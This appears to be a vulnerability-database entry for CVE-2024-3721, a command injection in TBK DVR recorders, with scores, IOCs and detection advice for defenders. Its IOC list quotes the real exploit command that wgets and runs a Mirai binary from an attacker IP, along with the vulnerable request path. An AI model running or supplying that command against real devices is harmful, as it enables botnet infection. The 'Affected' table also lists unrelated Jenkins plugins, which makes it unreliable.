cbcvebase.
CVE-2024-3721
published 2024-04-13


Priority: P181 · medium · 6.3 (CVSS 3.1)
CVSS 3.1 vector: AV:N / AC:L / PR:L / UI:N / S:U / C:L / I:L / A:L
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 86.49% (99.7th percentile)
A vulnerability was found in TBK DVR-4104 and DVR-4216 up to 20240412 and classified as critical. This issue affects some unknown processing of the file /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___. The manipulation of the argument mdb/mdc leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260573 was assigned to this vulnerability.

Affected (6 ranges)

Vendor  | Product                                  | Version range | Fixed in
jenkins | git_server_plugin                        | -             | -
jenkins | script_security_plugin                   | -             | -
jenkins | subversion_partial_release_manager_plugin | -             | -
jenkins | telegram_bot_plugin                      | -             | -
tbk     | dvr-4104                                 | -             | -
tbk     | dvr-4216                                 | -             | -

Detection & IOCs (extracted from sources)

url: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
command: cd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
ip: 42.112.26[.]36
filename: arm7
filename: selftbk.sh
hash: 011a406e89e603e93640b10325ebbdc8
hash: 24fd043f9175680d0c061b28a2801dfc
hash: 29b83f0aae7ed38d27ea37d26f3c9117
hash: 2e9920b21df472b4dd1e8db4863720bf
hash: 3120a5920f8ff70ec6c5a45d7bf2acc8
hash: 3c2f6175894bee698c61c6ce76ff9674
hash: 45a41ce9f4d8bb2592e8450a1de95dcc
hash: 524a57c8c595d9d4cd364612fe2f057c
hash: 74dee23eaa98e2e8a7fc355f06a11d97
hash: 761909a234ee4f1d856267abe30a3935
hash: 7eb3d72fa7d730d3dbca4df34fe26274
hash: 8a3e1176cb160fb42357fa3f46f0cbde
hash: 8d92e79b7940f0ac5b01bbb77737ca6c
hash: 95eaa3fa47a609ceefa24e8c7787bd99
hash: 96ee8cc2edc8227a640cef77d4a24e83
hash: aaf34c27edfc3531cf1cf2f2e9a9c45b
hash: ba32f4eef7de6bae9507a63bde1a43aa
ip: 116.203.104[.]203
ip: 130.61.64[.]122
ip: 161.97.219[.]84
ip: 130.61.69[.]123
ip: 185.84.81[.]194
ip: 54.36.111[.]116
ip: 192.3.165[.]37
ip: 162.243.19[.]47
ip: 63.231.92[.]27
ip: 80.152.203[.]134
bytes: RC4 key: 6e7976666525a97639777d2d7f303177
  • Detect CVE-2024-3721 exploitation attempts by monitoring for POST requests to the path /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ with mdb/mdc parameters containing shell commands.
  • Flag the misspelled User-Agent string 'Mozila/5.0' (single 'l') in HTTP requests, which is a distinctive indicator of this exploit campaign.
  • Detect the Mirai variant's anti-VM behavior: the malware enumerates /proc/<PID>/cmdline looking for 'VMware' or 'QEMU-arm' strings to check if it is running in a virtual environment.
  • Kaspersky detects the implant under the signatures HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.
  • The Nexcorium botnet campaign (reported by FortiGuard Labs) uses HTTP response headers containing 'X-Hacked-By: Nexus Team - Exploited By Erratic' as a campaign marker.
  • The vulnerability affects TBK DVR-4104 and DVR-4216 devices but has also been re-branded under multiple vendor names; patch availability is uncertain across all brands.

CVSS provenance

nvd (v3.1): 6.3 MEDIUM · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
nvd (v2.0): 6.5 MEDIUM · AV:N/AC:L/Au:S/C:P/I:P/A:P
ghsa: 4.3 MEDIUM
vulncheck: 6.3 MEDIUM